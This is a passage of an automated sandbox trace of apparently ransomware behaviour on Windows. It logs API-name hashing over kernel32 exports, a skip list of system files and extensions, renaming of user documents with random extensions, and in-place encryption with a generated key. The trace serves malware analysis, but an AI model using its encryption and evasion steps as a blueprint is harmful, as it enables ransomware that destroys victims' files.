lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.944] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.944] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.944] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.945] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.945] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.945] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.945] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.945] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.945] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.945] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.945] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.945] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.945] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.945] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.945] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.945] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx") returned 67 [0083.945] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx.iYdHoHQ") returned 75 [0083.945] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\ii_h.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx.iYdHoHQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\ii_h.pptx.iydhohq"), dwFlags=0x0) returned 1 [0083.946] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.946] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.946] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.947] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda6ad3b0, ftCreationTime.dwHighDateTime=0x1d4cb85, ftLastAccessTime.dwLowDateTime=0x14afb780, ftLastAccessTime.dwHighDateTime=0x1d4ca0e, ftLastWriteTime.dwLowDateTime=0x14afb780, ftLastWriteTime.dwHighDateTime=0x1d4ca0e, nFileSizeHigh=0x0, nFileSizeLow=0x12e0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jfn8J-ja5_DT9.ppt", cAlternateFileName="JFN8J-~1.PPT")) returned 1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="DECRYPT-FILES.txt") returned 1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="autorun.inf") returned 1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="boot.ini") returned 1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="desktop.ini") returned 1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="ntuser.dat") returned -1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="iconcache.db") returned 1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="bootsect.bak") returned 1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="ntuser.dat.log") returned -1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="thumbs.db") returned -1 [0083.947] lstrcmpiW (lpString1="Jfn8J-ja5_DT9.ppt", lpString2="Bootfont.bin") returned 1 [0083.947] lstrlenW (lpString="Jfn8J-ja5_DT9.ppt") returned 17 [0083.947] lstrcmpiW (lpString1="ppt", lpString2="lnk") returned 1 [0083.947] lstrcmpiW (lpString1="ppt", lpString2="exe") returned 1 [0083.947] lstrcmpiW (lpString1="ppt", lpString2="sys") returned -1 [0083.947] lstrcmpiW (lpString1="ppt", lpString2="dll") returned 1 [0083.947] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.947] lstrlenW (lpString="Jfn8J-ja5_DT9.ppt") returned 17 [0083.947] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.947] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="Jfn8J-ja5_DT9.ppt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt" [0083.947] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\Jfn8J-ja5_DT9.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\jfn8j-ja5_dt9.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0083.948] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=77323) returned 1 [0083.948] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0083.948] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.948] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.948] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.948] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.948] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.948] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.950] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.950] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.951] CloseHandle (hObject=0x42c) returned 1 [0083.951] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.951] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.952] CloseHandle (hObject=0x0) returned 0 [0083.952] CloseHandle (hObject=0x428) returned 1 [0083.952] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.952] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.953] GetTickCount () returned 0x114d73d [0083.953] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.953] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.953] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.953] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.953] lstrlenA (lpString="kernel32.dll") returned 12 [0083.953] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.954] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.954] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.954] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.954] lstrlenA (lpString="ADDATOMA") returned 8 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.954] lstrlenA (lpString="ADDATOMW") returned 8 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.954] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.954] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.954] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.954] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.954] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.954] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.954] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.954] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.954] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.954] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.954] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.954] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.954] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.954] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.955] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.955] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.955] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.955] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.955] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.955] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.955] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.955] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.955] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.955] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.955] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.955] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.955] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.955] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.955] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.955] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.955] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.956] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.956] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.956] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.956] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.956] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.956] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.956] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.956] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.956] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.956] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.956] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.956] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.957] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.957] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.957] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.957] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.957] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.957] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.957] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.957] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.957] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.957] lstrlenA (lpString="BEEP") returned 4 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.957] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.957] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.957] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.957] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.957] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.957] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.957] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.957] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.957] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.957] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.958] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.958] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.958] lstrlenA (lpString="CANCELIO") returned 8 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.958] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.958] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.958] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.958] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.958] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: 